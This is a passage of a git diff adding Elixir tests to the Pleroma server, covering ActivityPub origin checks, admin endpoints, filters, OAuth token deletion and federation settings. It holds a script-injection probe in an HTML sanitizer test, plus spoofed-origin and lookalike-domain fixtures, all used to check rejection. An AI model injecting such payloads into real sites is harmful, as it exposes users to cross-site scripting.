     end + +    test "it strips internal hashtag data" do +      user = insert(:user) + +      {:ok, activity} = CommonAPI.post(user, %{"status" => "#2hu"}) + +      expected_tag = %{ +        "href" => Pleroma.Web.Endpoint.url() <> "/tags/2hu", +        "type" => "Hashtag", +        "name" => "#2hu" +      } + +      {:ok, modified} = Transmogrifier.prepare_outgoing(activity.data) + +      assert modified["object"]["tag"] == [expected_tag] +    end + +    test "it strips internal fields" do +      user = insert(:user) + +      {:ok, activity} = CommonAPI.post(user, %{"status" => "#2hu :moominmamma:"}) + +      {:ok, modified} = Transmogrifier.prepare_outgoing(activity.data) + +      assert length(modified["object"]["tag"]) == 2 + +      assert is_nil(modified["object"]["emoji"]) +      assert is_nil(modified["object"]["likes"]) +      assert is_nil(modified["object"]["like_count"]) +      assert is_nil(modified["object"]["announcements"]) +      assert is_nil(modified["object"]["announcement_count"]) +      assert is_nil(modified["object"]["context_id"]) +    end    end    describe "user upgrade" do @@ -798,4 +885,114 @@ defmodule Pleroma.Web.ActivityPub.TransmogrifierTest do        assert rewritten["url"] == "http://example.com"      end    end + +  describe "actor origin containment" do +    test "it rejects objects with a bogus origin" do +      {:error, _} = ActivityPub.fetch_object_from_id("https://info.pleroma.site/activity.json") +    end + +    test "it rejects activities which reference objects with bogus origins" do +      data = %{ +        "@context" => "https://www.w3.org/ns/activitystreams", +        "id" => "http://mastodon.example.org/users/admin/activities/1234", +        "actor" => "http://mastodon.example.org/users/admin", +        "to" => ["https://www.w3.org/ns/activitystreams#Public"], +        "object" => "https://info.pleroma.site/activity.json", +        "type" => "Announce" +      } + +      :error = Transmogrifier.handle_incoming(data) +    end + +    test "it rejects objects when attributedTo is wrong (variant 1)" do +      {:error, _} = ActivityPub.fetch_object_from_id("https://info.pleroma.site/activity2.json") +    end + +    test "it rejects activities which reference objects that have an incorrect attribution (variant 1)" do +      data = %{ +        "@context" => "https://www.w3.org/ns/activitystreams", +        "id" => "http://mastodon.example.org/users/admin/activities/1234", +        "actor" => "http://mastodon.example.org/users/admin", +        "to" => ["https://www.w3.org/ns/activitystreams#Public"], +        "object" => "https://info.pleroma.site/activity2.json", +        "type" => "Announce" +      } + +      :error = Transmogrifier.handle_incoming(data) +    end + +    test "it rejects objects when attributedTo is wrong (variant 2)" do +      {:error, _} = ActivityPub.fetch_object_from_id("https://info.pleroma.site/activity3.json") +    end + +    test "it rejects activities which reference objects that have an incorrect attribution (variant 2)" do +      data = %{ +        "@context" => "https://www.w3.org/ns/activitystreams", +        "id" => "http://mastodon.example.org/users/admin/activities/1234", +        "actor" => "http://mastodon.example.org/users/admin", +        "to" => ["https://www.w3.org/ns/activitystreams#Public"], +        "object" => "https://info.pleroma.site/activity3.json", +        "type" => "Announce" +      } + +      :error = Transmogrifier.handle_incoming(data) +    end +  end + +  describe "general origin containment" do +    test "contain_origin_from_id() catches obvious spoofing attempts" do +      data = %{ +        "id" => "http://example.com/~alyssa/activities/1234.json" +      } + +      :error = +        Transmogrifier.contain_origin_from_id( +          "http://example.org/~alyssa/activities/1234.json", +          data +        ) +    end + +    test "contain_origin_from_id() allows alternate IDs within the same origin domain" do +      data = %{ +        "id" => "http://example.com/~alyssa/activities/1234.json" +      } + +      :ok = +        Transmogrifier.contain_origin_from_id( +          "http://example.com/~alyssa/activities/1234", +          data +        ) +    end + +    test "contain_origin_from_id() allows matching IDs" do +      data = %{ +        "id" => "http://example.com/~alyssa/activities/1234.json" +      } + +      :ok = +        Transmogrifier.contain_origin_from_id( +          "http://example.com/~alyssa/activities/1234.json", +          data +        ) +    end + +    test "users cannot be collided through fake direction spoofing attempts" do +      user = +        insert(:user, %{ +          nickname: "rye@niu.moe", +          local: false, +          ap_id: "https://niu.moe/users/rye", +          follower_address: User.ap_followers(%User{nickname: "rye@niu.moe"}) +        }) + +      {:error, _} = User.get_or_fetch_by_ap_id("https://n1u.moe/users/rye") +    end + +    test "all objects with fake directions are rejected by the object fetcher" do +      {:error, _} = +        ActivityPub.fetch_and_contain_remote_object_from_id( +          "https://info.pleroma.site/activity4.json" +        ) +    end +  end  end diff --git a/test/web/activity_pub/views/object_view_test.exs b/test/web/activity_pub/views/object_view_test.exs index 6a1311be7..d144a77fc 100644 --- a/test/web/activity_pub/views/object_view_test.exs +++ b/test/web/activity_pub/views/object_view_test.exs @@ -2,6 +2,7 @@ defmodule Pleroma.Web.ActivityPub.ObjectViewTest do    use Pleroma.DataCase    import Pleroma.Factory +  alias Pleroma.Web.CommonAPI    alias Pleroma.Web.ActivityPub.ObjectView    test "renders a note object" do @@ -13,5 +14,45 @@ defmodule Pleroma.Web.ActivityPub.ObjectViewTest do      assert result["to"] == note.data["to"]      assert result["content"] == note.data["content"]      assert result["type"] == "Note" +    assert result["@context"] +  end + +  test "renders a note activity" do +    note = insert(:note_activity) + +    result = ObjectView.render("object.json", %{object: note}) + +    assert result["id"] == note.data["id"] +    assert result["to"] == note.data["to"] +    assert result["object"]["type"] == "Note" +    assert result["object"]["content"] == note.data["object"]["content"] +    assert result["type"] == "Create" +    assert result["@context"] +  end + +  test "renders a like activity" do +    note = insert(:note_activity) +    user = insert(:user) + +    {:ok, like_activity, _} = CommonAPI.favorite(note.id, user) + +    result = ObjectView.render("object.json", %{object: like_activity}) + +    assert result["id"] == like_activity.data["id"] +    assert result["object"] == note.data["object"]["id"] +    assert result["type"] == "Like" +  end + +  test "renders an announce activity" do +    note = insert(:note_activity) +    user = insert(:user) + +    {:ok, announce_activity, _} = CommonAPI.repeat(note.id, user) + +    result = ObjectView.render("object.json", %{object: announce_activity}) + +    assert result["id"] == announce_activity.data["id"] +    assert result["object"] == note.data["object"]["id"] +    assert result["type"] == "Announce"    end  end diff --git a/test/web/admin_api/admin_api_controller_test.exs b/test/web/admin_api/admin_api_controller_test.exs new file mode 100644 index 000000000..fa0cb71bf --- /dev/null +++ b/test/web/admin_api/admin_api_controller_test.exs @@ -0,0 +1,112 @@ +defmodule Pleroma.Web.AdminAPI.AdminAPIControllerTest do +  use Pleroma.Web.ConnCase + +  alias Pleroma.{Repo, User} + +  import Pleroma.Factory +  import ExUnit.CaptureLog + +  describe "/api/pleroma/admin/user" do +    test "Delete" do +      admin = insert(:user, info: %{"is_admin" => true}) +      user = insert(:user) + +      conn = +        build_conn() +        |> assign(:user, admin) +        |> put_req_header("accept", "application/json") +        |> delete("/api/pleroma/admin/user?nickname=#{user.nickname}") + +      assert json_response(conn, 200) == user.nickname +    end + +    test "Create" do +      admin = insert(:user, info: %{"is_admin" => true}) + +      conn = +        build_conn() +        |> assign(:user, admin) +        |> put_req_header("accept", "application/json") +        |> post("/api/pleroma/admin/user", %{ +          "nickname" => "lain", +          "email" => "lain@example.org", +          "password" => "test" +        }) + +      assert json_response(conn, 200) == "lain" +    end +  end + +  describe "/api/pleroma/admin/permission_group" do +    test "GET is giving user_info" do +      admin = insert(:user, info: %{"is_admin" => true}) + +      conn = +        build_conn() +        |> assign(:user, admin) +        |> put_req_header("accept", "application/json") +        |> get("/api/pleroma/admin/permission_group/#{admin.nickname}") + +      assert json_response(conn, 200) == admin.info +    end + +    test "/:right POST, can add to a permission group" do +      admin = insert(:user, info: %{"is_admin" => true}) +      user = insert(:user) + +      user_info = +        user.info +        |> Map.put("is_admin", true) + +      conn = +        build_conn() +        |> assign(:user, admin) +        |> put_req_header("accept", "application/json") +        |> post("/api/pleroma/admin/permission_group/#{user.nickname}/admin") + +      assert json_response(conn, 200) == user_info +    end + +    test "/:right DELETE, can remove from a permission group" do +      admin = insert(:user, info: %{"is_admin" => true}) +      user = insert(:user, info: %{"is_admin" => true}) + +      user_info = +        user.info +        |> Map.put("is_admin", false) + +      conn = +        build_conn() +        |> assign(:user, admin) +        |> put_req_header("accept", "application/json") +        |> delete("/api/pleroma/admin/permission_group/#{user.nickname}/admin") + +      assert json_response(conn, 200) == user_info +    end +  end + +  test "/api/pleroma/admin/invite_token" do +    admin = insert(:user, info: %{"is_admin" => true}) + +    conn = +      build_conn() +      |> assign(:user, admin) +      |> put_req_header("accept", "application/json") +      |> get("/api/pleroma/admin/invite_token") + +    assert conn.status == 200 +  end + +  test "/api/pleroma/admin/password_reset" do +    admin = insert(:user, info: %{"is_admin" => true}) +    user = insert(:user, info: %{"is_admin" => true}) + +    conn = +      build_conn() +      |> assign(:user, admin) +      |> put_req_header("accept", "application/json") +      |> get("/api/pleroma/admin/password_reset?nickname=#{user.nickname}") + +    assert conn.status == 200 +  end +end diff --git a/test/web/common_api/common_api_test.exs b/test/web/common_api/common_api_test.exs index a5da271b3..cd36e409c 100644 --- a/test/web/common_api/common_api_test.exs +++ b/test/web/common_api/common_api_test.exs @@ -1,6 +1,7 @@  defmodule Pleroma.Web.CommonAPI.Test do    use Pleroma.DataCase    alias Pleroma.Web.CommonAPI +  alias Pleroma.User    import Pleroma.Factory @@ -10,4 +11,46 @@ defmodule Pleroma.Web.CommonAPI.Test do      assert activity.data["object"]["tag"] == ["2hu"]    end + +  test "it adds emoji when updating profiles" do +    user = insert(:user, %{name: ":karjalanpiirakka:"}) + +    CommonAPI.update(user) +    user = User.get_cached_by_ap_id(user.ap_id) +    [karjalanpiirakka] = user.info["source_data"]["tag"] + +    assert karjalanpiirakka["name"] == ":karjalanpiirakka:" +  end + +  describe "posting" do +    test "it filters out obviously bad tags when accepting a post as HTML" do +      user = insert(:user) + +      post = "<p><b>2hu</b></p><script>alert('xss')</script>" + +      {:ok, activity} = +        CommonAPI.post(user, %{ +          "status" => post, +          "content_type" => "text/html" +        }) + +      content = activity.data["object"]["content"] +      assert content == "<p><b>2hu</b></p>alert('xss')" +    end + +    test "it filters out obviously bad tags when accepting a post as Markdown" do +      user = insert(:user) + +      post = "<p><b>2hu</b></p><script>alert('xss')</script>" + +      {:ok, activity} = +        CommonAPI.post(user, %{ +          "status" => post, +          "content_type" => "text/markdown" +        }) + +      content = activity.data["object"]["content"] +      assert content == "<p><b>2hu</b></p>alert('xss')" +    end +  end  end diff --git a/test/web/common_api/common_api_utils_test.exs b/test/web/common_api/common_api_utils_test.exs index f39472ee3..b01ce04f8 100644 --- a/test/web/common_api/common_api_utils_test.exs +++ b/test/web/common_api/common_api_utils_test.exs @@ -1,5 +1,6 @@  defmodule Pleroma.Web.CommonAPI.UtilsTest do    alias Pleroma.Web.CommonAPI.Utils +  alias Pleroma.Web.Endpoint    alias Pleroma.Builders.{UserBuilder}    use Pleroma.DataCase @@ -29,4 +30,26 @@ defmodule Pleroma.Web.CommonAPI.UtilsTest do        assert Utils.confirm_current_password(user, "test") == {:ok, user}      end    end + +  test "parses emoji from name and bio" do +    {:ok, user} = UserBuilder.insert(%{name: ":karjalanpiirakka:", bio: ":perkele:"}) + +    expected = [ +      %{ +        "type" => "Emoji", +        "icon" => %{"type" => "Image", "url" => "#{Endpoint.url()}/finmoji/128px/perkele-128.png"}, +        "name" => ":perkele:" +      }, +      %{ +        "type" => "Emoji", +        "icon" => %{ +          "type" => "Image", +          "url" => "#{Endpoint.url()}/finmoji/128px/karjalanpiirakka-128.png" +        }, +        "name" => ":karjalanpiirakka:" +      } +    ] + +    assert expected == Utils.emoji_from_profile(user) +  end  end diff --git a/test/web/federator_test.exs b/test/web/federator_test.exs index 09533362a..02e1ca76e 100644 --- a/test/web/federator_test.exs +++ b/test/web/federator_test.exs @@ -1,6 +1,9 @@  defmodule Pleroma.Web.FederatorTest do    alias Pleroma.Web.Federator +  alias Pleroma.Web.CommonAPI    use Pleroma.DataCase +  import Pleroma.Factory +  import Mock    test "enqueues an element according to priority" do      queue = [%{item: 1, priority: 2}] @@ -17,4 +20,83 @@ defmodule Pleroma.Web.FederatorTest do      assert {2, [%{item: 1, priority: 2}]} = Federator.queue_pop(queue)    end + +  describe "Publish an activity" do +    setup do +      user = insert(:user) +      {:ok, activity} = CommonAPI.post(user, %{"status" => "HI"}) + +      relay_mock = { +        Pleroma.Web.ActivityPub.Relay, +        [], +        [publish: fn _activity -> send(self(), :relay_publish) end] +      } + +      %{activity: activity, relay_mock: relay_mock} +    end + +    test "with relays active, it publishes to the relay", %{ +      activity: activity, +      relay_mock: relay_mock +    } do +      with_mocks([relay_mock]) do +        Federator.handle(:publish, activity) +      end + +      assert_received :relay_publish +    end + +    test "with relays deactivated, it does not publish to the relay", %{ +      activity: activity, +      relay_mock: relay_mock +    } do +      Pleroma.Config.put([:instance, :allow_relay], false) + +      with_mocks([relay_mock]) do +        Federator.handle(:publish, activity) +      end + +      refute_received :relay_publish + +      Pleroma.Config.put([:instance, :allow_relay], true) +    end +  end + +  describe "Receive an activity" do +    test "successfully processes incoming AP docs with correct origin" do +      params = %{ +        "@context" => "https://www.w3.org/ns/activitystreams", +        "actor" => "http://mastodon.example.org/users/admin", +        "type" => "Create", +        "id" => "http://mastodon.example.org/users/admin/activities/1", +        "object" => %{ +          "type" => "Note", +          "content" => "hi world!", +          "id" => "http://mastodon.example.org/users/admin/objects/1", +          "attributedTo" => "http://mastodon.example.org/users/admin" +        }, +        "to" => ["https://www.w3.org/ns/activitystreams#Public"] +      } + +      {:ok, _activity} = Federator.handle(:incoming_ap_doc, params) +    end + +    test "rejects incoming AP docs with incorrect origin" do +      params = %{ +        "@context" => "https://www.w3.org/ns/activitystreams", +        "actor" => "https://niu.moe/users/rye", +        "type" => "Create", +        "id" => "http://mastodon.example.org/users/admin/activities/1", +        "object" => %{ +          "type" => "Note", +          "content" => "hi world!", +          "id" => "http://mastodon.example.org/users/admin/objects/1", +          "attributedTo" => "http://mastodon.example.org/users/admin" +        }, +        "to" => ["https://www.w3.org/ns/activitystreams#Public"] +      } + +      :error = Federator.handle(:incoming_ap_doc, params) +    end +  end  end diff --git a/test/web/mastodon_api/account_view_test.exs b/test/web/mastodon_api/account_view_test.exs index 35c8a1fb0..dc52b92bc 100644 --- a/test/web/mastodon_api/account_view_test.exs +++ b/test/web/mastodon_api/account_view_test.exs @@ -49,10 +49,48 @@ defmodule Pleroma.Web.MastodonAPI.AccountViewTest do          }        ],        fields: [], +      bot: false,        source: %{          note: "",          privacy: "public", -        sensitive: "false" +        sensitive: false +      } +    } + +    assert expected == AccountView.render("account.json", %{user: user}) +  end + +  test "Represent a Service(bot) account" do +    user = +      insert(:user, %{ +        info: %{"note_count" => 5, "follower_count" => 3, "source_data" => %{"type" => "Service"}}, +        nickname: "shp@shitposter.club", +        inserted_at: ~N[2017-08-15 15:47:06.597036] +      }) + +    expected = %{ +      id: to_string(user.id), +      username: "shp", +      acct: user.nickname, +      display_name: user.name, +      locked: false, +      created_at: "2017-08-15T15:47:06.000Z", +      followers_count: 3, +      following_count: 0, +      statuses_count: 5, +      note: user.bio, +      url: user.ap_id, +      avatar: "http://localhost:4001/images/avi.png", +      avatar_static: "http://localhost:4001/images/avi.png", +      header: "http://localhost:4001/images/banner.png", +      header_static: "http://localhost:4001/images/banner.png", +      emojis: [], +      fields: [], +      bot: true, +      source: %{ +        note: "", +        privacy: "public", +        sensitive: false        }      } @@ -85,8 +123,11 @@ defmodule Pleroma.Web.MastodonAPI.AccountViewTest do        followed_by: false,        blocking: true,        muting: false, +      muting_notifications: false,        requested: false, -      domain_blocking: false +      domain_blocking: false, +      showing_reblogs: false, +      endorsed: false      }      assert expected == AccountView.render("relationship.json", %{user: user, target: other_user}) diff --git a/test/web/mastodon_api/mastodon_api_controller_test.exs b/test/web/mastodon_api/mastodon_api_controller_test.exs index 9e33c1d04..ad67cae6b 100644 --- a/test/web/mastodon_api/mastodon_api_controller_test.exs +++ b/test/web/mastodon_api/mastodon_api_controller_test.exs @@ -178,6 +178,32 @@ defmodule Pleroma.Web.MastodonAPI.MastodonAPIControllerTest do        |> get("api/v1/timelines/home")      [_s1, _s2] = json_response(res_conn, 200) + +    # Test pagination +    Enum.each(1..20, fn _ -> +      {:ok, _} = +        CommonAPI.post(user_one, %{ +          "status" => "Hi @#{user_two.nickname}!", +          "visibility" => "direct" +        }) +    end) + +    res_conn = +      conn +      |> assign(:user, user_two) +      |> get("api/v1/timelines/direct") + +    statuses = json_response(res_conn, 200) +    assert length(statuses) == 20 + +    res_conn = +      conn +      |> assign(:user, user_two) +      |> get("api/v1/timelines/direct", %{max_id: List.last(statuses)["id"]}) + +    [status] = json_response(res_conn, 200) + +    assert status["url"] != direct.data["id"]    end    test "replying to a status", %{conn: conn} do @@ -198,6 +224,21 @@ defmodule Pleroma.Web.MastodonAPI.MastodonAPIControllerTest do      assert activity.data["object"]["inReplyToStatusId"] == replied_to.id    end +  test "posting a status with an invalid in_reply_to_id", %{conn: conn} do +    user = insert(:user) + +    conn = +      conn +      |> assign(:user, user) +      |> post("/api/v1/statuses", %{"status" => "xD", "in_reply_to_id" => ""}) + +    assert %{"content" => "xD", "id" => id} = json_response(conn, 200) + +    activity = Repo.get(Activity, id) + +    assert activity +  end +    test "verify_credentials", %{conn: conn} do      user = insert(:user) @@ -206,7 +247,19 @@ defmodule Pleroma.Web.MastodonAPI.MastodonAPIControllerTest do        |> assign(:user, user)        |> get("/api/v1/accounts/verify_credentials") -    assert %{"id" => id} = json_response(conn, 200) +    assert %{"id" => id, "source" => %{"privacy" => "public"}} = json_response(conn, 200) +    assert id == to_string(user.id) +  end + +  test "verify_credentials default scope unlisted", %{conn: conn} do +    user = insert(:user, %{info: %{"default_scope" => "unlisted"}}) + +    conn = +      conn +      |> assign(:user, user) +      |> get("/api/v1/accounts/verify_credentials") + +    assert %{"id" => id, "source" => %{"privacy" => "unlisted"}} = json_response(conn, 200)      assert id == to_string(user.id)    end @@ -251,6 +304,127 @@ defmodule Pleroma.Web.MastodonAPI.MastodonAPIControllerTest do      end    end +  describe "filters" do +    test "creating a filter", %{conn: conn} do +      user = insert(:user) + +      filter = %Pleroma.Filter{ +        phrase: "knights", +        context: ["home"] +      } + +      conn = +        conn +        |> assign(:user, user) +        |> post("/api/v1/filters", %{"phrase" => filter.phrase, context: filter.context}) + +      assert response = json_response(conn, 200) +      assert response["phrase"] == filter.phrase +      assert response["context"] == filter.context +      assert response["id"] != nil +      assert response["id"] != "" +    end + +    test "fetching a list of filters", %{conn: conn} do +      user = insert(:user) + +      query_one = %Pleroma.Filter{ +        user_id: user.id, +        filter_id: 1, +        phrase: "knights", +        context: ["home"] +      } + +      query_two = %Pleroma.Filter{ +        user_id: user.id, +        filter_id: 2, +        phrase: "who", +        context: ["home"] +      } + +      {:ok, filter_one} = Pleroma.Filter.create(query_one) +      {:ok, filter_two} = Pleroma.Filter.create(query_two) + +      conn = +        conn +        |> assign(:user, user) +        |> get("/api/v1/filters") + +      assert response = json_response(conn, 200) +    end + +    test "get a filter", %{conn: conn} do +      user = insert(:user) + +      query = %Pleroma.Filter{ +        user_id: user.id, +        filter_id: 2, +        phrase: "knight", +        context: ["home"] +      } + +      {:ok, filter} = Pleroma.Filter.create(query) + +      conn = +        conn +        |> assign(:user, user) +        |> get("/api/v1/filters/#{filter.filter_id}") + +      assert response = json_response(conn, 200) +    end + +    test "update a filter", %{conn: conn} do +      user = insert(:user) + +      query = %Pleroma.Filter{ +        user_id: user.id, +        filter_id: 2, +        phrase: "knight", +        context: ["home"] +      } + +      {:ok, filter} = Pleroma.Filter.create(query) + +      new = %Pleroma.Filter{ +        phrase: "nii", +        context: ["home"] +      } + +      conn = +        conn +        |> assign(:user, user) +        |> put("/api/v1/filters/#{query.filter_id}", %{ +          phrase: new.phrase, +          context: new.context +        }) + +      assert response = json_response(conn, 200) +      assert response["phrase"] == new.phrase +      assert response["context"] == new.context +    end + +    test "delete a filter", %{conn: conn} do +      user = insert(:user) + +      query = %Pleroma.Filter{ +        user_id: user.id, +        filter_id: 2, +        phrase: "knight", +        context: ["home"] +      } + +      {:ok, filter} = Pleroma.Filter.create(query) + +      conn = +        conn +        |> assign(:user, user) +        |> delete("/api/v1/filters/#{filter.filter_id}") + +      assert response = json_response(conn, 200) +      assert response == %{} +    end +  end +    describe "lists" do      test "creating a list", %{conn: conn} do        user = insert(:user) @@ -368,6 +542,30 @@ defmodule Pleroma.Web.MastodonAPI.MastodonAPIControllerTest do        assert id == to_string(activity_two.id)      end + +    test "list timeline does not leak non-public statuses for unfollowed users", %{conn: conn} do +      user = insert(:user) +      other_user = insert(:user) +      {:ok, activity_one} = TwitterAPI.create_status(other_user, %{"status" => "Marisa is cute."}) + +      {:ok, activity_two} = +        TwitterAPI.create_status(other_user, %{ +          "status" => "Marisa is cute.", +          "visibility" => "private" +        }) + +      {:ok, list} = Pleroma.List.create("name", user) +      {:ok, list} = Pleroma.List.follow(list, other_user) + +      conn = +        conn +        |> assign(:user, user) +        |> get("/api/v1/timelines/list/#{list.id}") + +      assert [%{"id" => id}] = json_response(conn, 200) + +      assert id == to_string(activity_one.id) +    end    end    describe "notifications" do @@ -691,6 +889,18 @@ defmodule Pleroma.Web.MastodonAPI.MastodonAPIControllerTest do        assert User.following?(other_user, user) == true      end +    test "verify_credentials", %{conn: conn} do +      user = insert(:user, %{info: %{"default_scope" => "private"}}) + +      conn = +        conn +        |> assign(:user, user) +        |> get("/api/v1/accounts/verify_credentials") + +      assert %{"id" => id, "source" => %{"privacy" => "private"}} = json_response(conn, 200) +      assert id == to_string(user.id) +    end +      test "/api/v1/follow_requests/:id/reject works" do        user = insert(:user, %{info: %{"locked" => true}})        other_user = insert(:user) @@ -760,11 +970,20 @@ defmodule Pleroma.Web.MastodonAPI.MastodonAPIControllerTest do        {:ok, [_activity]} =          OStatus.fetch_activity_from_url("https://shitposter.club/notice/2827873") -      conn = +      nconn =          conn          |> get("/api/v1/timelines/tag/2hu") -      assert [%{"id" => id}] = json_response(conn, 200) +      assert [%{"id" => id}] = json_response(nconn, 200) + +      assert id == to_string(activity.id) + +      # works for different capitalization too +      nconn = +        conn +        |> get("/api/v1/timelines/tag/2HU") + +      assert [%{"id" => id}] = json_response(nconn, 200)        assert id == to_string(activity.id)      end) diff --git a/test/web/mastodon_api/mastodon_socket_test.exs b/test/web/mastodon_api/mastodon_socket_test.exs new file mode 100644 index 000000000..c7d71defc --- /dev/null +++ b/test/web/mastodon_api/mastodon_socket_test.exs @@ -0,0 +1,33 @@ +defmodule Pleroma.Web.MastodonApi.MastodonSocketTest do +  use Pleroma.DataCase + +  alias Pleroma.Web.MastodonApi.MastodonSocket +  alias Pleroma.Web.{Streamer, CommonAPI} +  alias Pleroma.User + +  import Pleroma.Factory + +  test "public is working when non-authenticated" do +    user = insert(:user) + +    task = +      Task.async(fn -> +        assert_receive {:text, _}, 4_000 +      end) + +    fake_socket = %{ +      transport_pid: task.pid, +      assigns: %{} +    } + +    topics = %{ +      "public" => [fake_socket] +    } + +    {:ok, activity} = CommonAPI.post(user, %{"status" => "Test"}) + +    Streamer.push_to_socket(topics, "public", activity) + +    Task.await(task) +  end +end diff --git a/test/web/mastodon_api/status_view_test.exs b/test/web/mastodon_api/status_view_test.exs index 03c798bef..31554a07d 100644 --- a/test/web/mastodon_api/status_view_test.exs +++ b/test/web/mastodon_api/status_view_test.exs @@ -7,6 +7,24 @@ defmodule Pleroma.Web.MastodonAPI.StatusViewTest do    alias Pleroma.Web.CommonAPI    import Pleroma.Factory +  test "a note with null content" do +    note = insert(:note_activity) + +    data = +      note.data +      |> put_in(["object", "content"], nil) + +    note = +      note +      |> Map.put(:data, data) + +    user = User.get_cached_by_ap_id(note.data["actor"]) + +    status = StatusView.render("status.json", %{activity: note}) + +    assert status.content == "" +  end +    test "a note activity" do      note = insert(:note_activity)      user = User.get_cached_by_ap_id(note.data["actor"]) @@ -28,6 +46,7 @@ defmodule Pleroma.Web.MastodonAPI.StatusViewTest do        content: HtmlSanitizeEx.basic_html(note.data["object"]["content"]),        created_at: created_at,        reblogs_count: 0, +      replies_count: 0,        favourites_count: 0,        reblogged: false,        favourited: false, @@ -47,7 +66,8 @@ defmodule Pleroma.Web.MastodonAPI.StatusViewTest do          %{            shortcode: "2hu",            url: "corndog.png", -          static_url: "corndog.png" +          static_url: "corndog.png", +          visible_in_picker: false          }        ]      } diff --git a/test/web/node_info_test.exs b/test/web/node_info_test.exs new file mode 100644 index 000000000..a6376453c --- /dev/null +++ b/test/web/node_info_test.exs @@ -0,0 +1,49 @@ +defmodule Pleroma.Web.NodeInfoTest do +  use Pleroma.Web.ConnCase + +  import Pleroma.Factory + +  test "nodeinfo shows staff accounts", %{conn: conn} do +    user = insert(:user, %{local: true, info: %{"is_moderator" => true}}) + +    conn = +      conn +      |> get("/nodeinfo/2.0.json") + +    assert result = json_response(conn, 200) + +    assert user.ap_id in result["metadata"]["staffAccounts"] +  end + +  test "returns 404 when federation is disabled" do +    instance = +      Application.get_env(:pleroma, :instance) +      |> Keyword.put(:federating, false) + +    Application.put_env(:pleroma, :instance, instance) + +    conn +    |> get("/.well-known/nodeinfo") +    |> json_response(404) + +    conn +    |> get("/nodeinfo/2.0.json") +    |> json_response(404) + +    instance = +      Application.get_env(:pleroma, :instance) +      |> Keyword.put(:federating, true) + +    Application.put_env(:pleroma, :instance, instance) +  end + +  test "returns 200 when federation is enabled" do +    conn +    |> get("/.well-known/nodeinfo") +    |> json_response(200) + +    conn +    |> get("/nodeinfo/2.0.json") +    |> json_response(200) +  end +end diff --git a/test/web/oauth/authorization_test.exs b/test/web/oauth/authorization_test.exs index 4a9e2a3ac..98c7c4133 100644 --- a/test/web/oauth/authorization_test.exs +++ b/test/web/oauth/authorization_test.exs @@ -55,4 +55,26 @@ defmodule Pleroma.Web.OAuth.AuthorizationTest do      assert {:error, "token expired"} == Authorization.use_token(expired_auth)    end + +  test "delete authorizations" do +    {:ok, app} = +      Repo.insert( +        App.register_changeset(%App{}, %{ +          client_name: "client", +          scopes: "scope", +          redirect_uris: "url" +        }) +      ) + +    user = insert(:user) + +    {:ok, auth} = Authorization.create_authorization(app, user) +    {:ok, auth} = Authorization.use_token(auth) + +    {auths, _} = Authorization.delete_user_authorizations(user) + +    {_, invalid} = Authorization.use_token(auth) + +    assert auth != invalid +  end  end diff --git a/test/web/oauth/token_test.exs b/test/web/oauth/token_test.exs index 58448949c..f926ff50b 100644 --- a/test/web/oauth/token_test.exs +++ b/test/web/oauth/token_test.exs @@ -29,4 +29,36 @@ defmodule Pleroma.Web.OAuth.TokenTest do      auth = Repo.get(Authorization, auth.id)      {:error, "already used"} = Token.exchange_token(app, auth)    end + +  test "deletes all tokens of a user" do +    {:ok, app1} = +      Repo.insert( +        App.register_changeset(%App{}, %{ +          client_name: "client1", +          scopes: "scope", +          redirect_uris: "url" +        }) +      ) + +    {:ok, app2} = +      Repo.insert( +        App.register_changeset(%App{}, %{ +          client_name: "client2", +          scopes: "scope", +          redirect_uris: "url" +        }) +      ) + +    user = insert(:user) + +    {:ok, auth1} = Authorization.create_authorization(app1, user) +    {:ok, auth2} = Authorization.create_authorization(app2, user) + +    {:ok, token1} = Token.exchange_token(app1, auth1) +    {:ok, token2} = Token.exchange_token(app2, auth2) + +    {tokens, _} = Token.delete_user_tokens(user) + +    assert tokens == 2 +  end  end diff --git a/test/web/ostatus/ostatus_controller_test.exs b/test/web/ostatus/ostatus_controller_test.exs index c23b175e8..371c835c0 100644 --- a/test/web/ostatus/ostatus_controller_test.exs +++ b/test/web/ostatus/ostatus_controller_test.exs @@ -2,6 +2,7 @@ defmodule Pleroma.Web.OStatus.OStatusControllerTest do    use Pleroma.Web.ConnCase    import Pleroma.Factory    alias Pleroma.{User, Repo} +  alias Pleroma.Web.CommonAPI    alias Pleroma.Web.OStatus.ActivityRepresenter    test "decodes a salmon", %{conn: conn} do @@ -167,6 +168,32 @@ defmodule Pleroma.Web.OStatus.OStatusControllerTest do      assert json_response(conn, 200)    end +  test "only gets a notice in AS2 format for Create messages", %{conn: conn} do +    note_activity = insert(:note_activity) +    url = "/notice/#{note_activity.id}" + +    conn = +      conn +      |> put_req_header("accept", "application/activity+json") +      |> get(url) + +    assert json_response(conn, 200) + +    user = insert(:user) + +    {:ok, like_activity, _} = CommonAPI.favorite(note_activity.id, user) +    url = "/notice/#{like_activity.id}" + +    assert like_activity.data["type"] == "Like" + +    conn = +      build_conn() +      |> put_req_header("accept", "application/activity+json") +      |> get(url) + +    assert response(conn, 404) +  end +    test "gets an activity in AS2 format", %{conn: conn} do      note_activity = insert(:note_activity)      [_, uuid] = hd(Regex.scan(~r/.+\/([\w-]+)$/, note_activity.data["id"])) diff --git a/test/web/ostatus/ostatus_test.exs b/test/web/ostatus/ostatus_test.exs index f095e41dd..f95da8b0a 100644 --- a/test/web/ostatus/ostatus_test.exs +++ b/test/web/ostatus/ostatus_test.exs @@ -456,4 +456,28 @@ defmodule Pleroma.Web.OStatusTest do               "https://www.w3.org/ns/activitystreams#Public"             ]    end + +  describe "is_representable?" do +    test "Note objects are representable" do +      note_activity = insert(:note_activity) + +      assert OStatus.is_representable?(note_activity) +    end + +    test "Article objects are not representable" do +      note_activity = insert(:note_activity) + +      note_object = Object.normalize(note_activity.data["object"]) + +      note_data = +        note_object.data +        |> Map.put("type", "Article") + +      cs = Object.change(note_object, %{data: note_data}) +      {:ok, article_object} = Repo.update(cs) + +      # the underlying object is now an Article instead of a note, so this should fail +      refute OStatus.is_representable?(note_activity) +    end +  end  end diff --git a/test/web/plugs/federating_plug_test.exs b/test/web/plugs/federating_plug_test.exs new file mode 100644 index 000000000..1455a1c46 --- /dev/null +++ b/test/web/plugs/federating_plug_test.exs @@ -0,0 +1,33 @@ +defmodule Pleroma.Web.FederatingPlugTest do +  use Pleroma.Web.ConnCase + +  test "returns and halt the conn when federating is disabled" do +    instance = +      Application.get_env(:pleroma, :instance) +      |> Keyword.put(:federating, false) + +    Application.put_env(:pleroma, :instance, instance) + +    conn = +      build_conn() +      |> Pleroma.Web.FederatingPlug.call(%{}) + +    assert conn.status == 404 +    assert conn.halted + +    instance = +      Application.get_env(:pleroma, :instance) +     